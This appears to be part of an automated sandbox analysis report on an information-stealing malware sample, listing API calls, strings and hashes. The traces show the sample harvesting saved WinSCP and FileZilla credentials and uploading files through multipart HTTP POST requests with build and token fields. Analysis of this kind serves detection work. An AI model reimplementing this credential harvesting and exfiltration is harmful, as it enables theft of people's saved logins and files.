                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66D0A7F17012106BD6206764BC4DBC7395C9F05760F440021F981C62A0C27448C1C695
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2452939696-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 180fdf943f679f0908199cc39e44e1d0c0beb04e4c0ad37296b993fdceb6a780
                                                                                                                                                                                                                                                                                      • Instruction ID: 2046fac39060b3b77728db7903071d1a84601050c9d96548d090f17622b8ad63
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 180fdf943f679f0908199cc39e44e1d0c0beb04e4c0ad37296b993fdceb6a780
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6AD0237160012097C7002B18FD4D98737545FC1708F010111F745B7151D135996E87DF
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040D09D
                                                                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040D0B6
                                                                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040D0CE
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040D0EA
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D0FB
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000008,-00000001), ref: 0040D105
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040D130
                                                                                                                                                                                                                                                                                      • strcpy_s.MSVCRT ref: 0040D184
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D1CD
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D21F
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040D244
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,?,00000000), ref: 0040D2BA
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000008,00000000), ref: 0040D2C4
                                                                                                                                                                                                                                                                                      • strcpy_s.MSVCRT ref: 0040D2D6
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D2E2
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D2EC
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D318
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D322
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D332
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D33C
                                                                                                                                                                                                                                                                                      • strcpy_s.MSVCRT ref: 0040D34E
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D35A
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D364
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D385
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D38F
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D39F
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D3A9
                                                                                                                                                                                                                                                                                      • strcpy_s.MSVCRT ref: 0040D3B7
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D3C3
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3CD
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D3E4
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3EE
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D40F
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D419
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D429
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D433
                                                                                                                                                                                                                                                                                      • strcpy_s.MSVCRT ref: 0040D44B
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D457
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,76EC5E70), ref: 0040D461
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040D468
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D47B
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D485
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040D4B6
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 0040D4CE
                                                                                                                                                                                                                                                                                      • strcpy_s.MSVCRT ref: 0040D50C
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D559
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D5BB
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D5C3
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D5CD
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040D5D4
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D5E9
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 0040D5F3
                                                                                                                                                                                                                                                                                      • strcpy_s.MSVCRT ref: 0040D602
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D60A
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D614
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040D65C
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D7C4
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D811
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000), ref: 0040D883
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(0042150A,00000000), ref: 0040D9A7
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D9DD
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D9FA
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DA10
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DA26
                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040DA55
                                                                                                                                                                                                                                                                                      • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,00000004), ref: 0040DA7F
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040DA9C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • Security, xrefs: 0040DA77
                                                                                                                                                                                                                                                                                      • UseMasterPassword, xrefs: 0040DA72
                                                                                                                                                                                                                                                                                      • Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040DA4B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$Process$Free$??3@Allocstrcpy_s$lstrlen$memset$strlen$_invalid_parameter_noinfo_noreturnstrchr$CloseOpenValue
                                                                                                                                                                                                                                                                                      • String ID: Security$Software\Martin Prikryl\WinSCP 2\Configuration$UseMasterPassword

                                                                                                                                                                                                                                                                                      Control-flow Graph

[Figure: control-flow graph beginning at basic block 40de80-40df0b; legend: Executed / Not Executed]
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                        • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 0040DF2D
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(0042150A,0042150A,0042150A,0042150A,?,00000028,0042150A), ref: 0040DF71
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,000F423F), ref: 0040DF7F
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040DF99
                                                                                                                                                                                                                                                                                        • Part of subcall function 00413E50: Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00413E50: CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00413E50: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E0BF
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040E0CA
                                                                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E0F6
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040E101
                                                                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 0040E12D
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040E138
                                                                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E164
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040E173
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,00000000,0000001B,-000000DE), ref: 0040E1A5
                                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040E1D1
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrlen$lstrcpy$AllocLocal$File$CreateHeaplstrcat$CloseFolderFreeHandleObjectPathProcessReadSingleSizeSleepThreadWaitstrtok_s
                                                                                                                                                                                                                                                                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                                                                                                      • API String ID: 146520747-935134978
                                                                                                                                                                                                                                                                                      • Opcode ID: 206b794b4683130859c7aa731cb200fb9fa8a06513edf901f40cb2cd5f66bbdd
                                                                                                                                                                                                                                                                                      • Instruction ID: 0a1636bca5df7c154e2ca60be6e54f7e11655359c512dbb65eed7aa386b826a3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 206b794b4683130859c7aa731cb200fb9fa8a06513edf901f40cb2cd5f66bbdd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22E1C731A00218ABCB14EBB1DC959EE7B79AF58304F40045EF50277192DF7CA9C6CBA9

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                        • Part of subcall function 004116B0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,00403103,00000000,00000000,?,?,?), ref: 004116E9
                                                                                                                                                                                                                                                                                        • Part of subcall function 004116B0: GetProcessHeap.KERNEL32 ref: 004116FC
                                                                                                                                                                                                                                                                                        • Part of subcall function 004116B0: RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 00411706
                                                                                                                                                                                                                                                                                        • Part of subcall function 004116B0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0041171D
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 00403114
                                                                                                                                                                                                                                                                                        • Part of subcall function 004116B0: GetLastError.KERNEL32 ref: 00411733
                                                                                                                                                                                                                                                                                        • Part of subcall function 004116B0: GetProcessHeap.KERNEL32 ref: 00411741
                                                                                                                                                                                                                                                                                        • Part of subcall function 004116B0: HeapFree.KERNEL32(00000000,00000000,?), ref: 0041174B
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,https,0042150A,0042150A,0042150A,0042150A,00000000,00000000,00000000,00000000), ref: 0040316F
                                                                                                                                                                                                                                                                                      • InternetOpenA.WININET ref: 0040319E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                      • InternetConnectA.WININET ref: 00403290
                                                                                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 004032CA
                                                                                                                                                                                                                                                                                      • InternetSetOptionA.WININET(?,0000001F,?,00000004), ref: 004032FA
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,",?,?,file_data,?,?,Content-Disposition: form-data; name=",?,?,00421505,?,?,?), ref: 0040364A
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00403660
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040366C
                                                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00403679
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040369B
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00411952,00000000), ref: 004036A2
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,00000014), ref: 004036BC
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,?,00000014), ref: 004036C7
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 004036E1
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 00403703
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 00403708
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00403739
                                                                                                                                                                                                                                                                                      • HttpSendRequestA.WININET(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040374F
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 0040375D
                                                                                                                                                                                                                                                                                      • HttpQueryInfoA.WININET(?,00000013,?,00000100,00000000), ref: 004037A4
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,000007CF,?), ref: 004037D6
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,000007CF,?), ref: 00403823
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,block,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00403848
                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00403850
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00403859
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00403866
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrlen$Internet$Heap$lstrcpy$Process$Httpmemcpy$AllocateBinaryCloseCryptFileHandleOpenReadRequestStringlstrcat$ConnectCrackErrorExitFreeInfoLastOptionQuerySendSleep
                                                                                                                                                                                                                                                                                      • String ID: ------$"$--$Content-Disposition: form-data; name="$Content-Type: multipart/form-data; boundary=----$ERROR$HTTP/1.1$POST$block$build_id$file_data$file_name$https$token

Control-flow Graph

[Figure: control-flow graph of the routine beginning at 403920; nodes are marked Executed or Not Executed]
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      • InternetOpenA.WININET(?,?,?,?,?), ref: 004039B9
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,https,?,?,?,?,?), ref: 004039C8
                                                                                                                                                                                                                                                                                      • InternetConnectA.WININET ref: 00403B08
                                                                                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00403B4B
                                                                                                                                                                                                                                                                                      • InternetSetOptionA.WININET(?,0000001F,00010300,00000004), ref: 00403B75
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,",?,?,mode,?,?,Content-Disposition: form-data; name=",?,?,00421505), ref: 00403E15
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00403E28
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 00403E34
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,00000000), ref: 00403E41
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00403E66
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 00403E6B
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,00421505,?,?,?,?,00000014,?,?), ref: 00403E82
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,00421505,?,?,?,?,00000014,?,?), ref: 00403EA4
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,00421505,?,?,?,?,00000014,?,?), ref: 00403EA9
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403ED9
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403EFD
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403F22
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00421505,?,?,?,?), ref: 00403F2C
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00403F38
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00403F41
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00417786), ref: 00403F4A
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403F74
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00421505,?,?,?,?), ref: 00403F7E
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,000000C7,?), ref: 00403F93
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,00000000,000000C7,?), ref: 00403FE6
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00403FFA
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00404007
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00404011
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,?,?,0042150A,00000000,?,?,?,?,?,?,?), ref: 0040406D
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 0040407C
                                                                                                                                                                                                                                                                                        • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                        • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Internet$lstrlen$Heap$CloseHandle$lstrcpy$Process$Free$FileOpenReadlstrcatmemcpy$AllocConnectCrackHttpOptionRequestSleepSystemTime
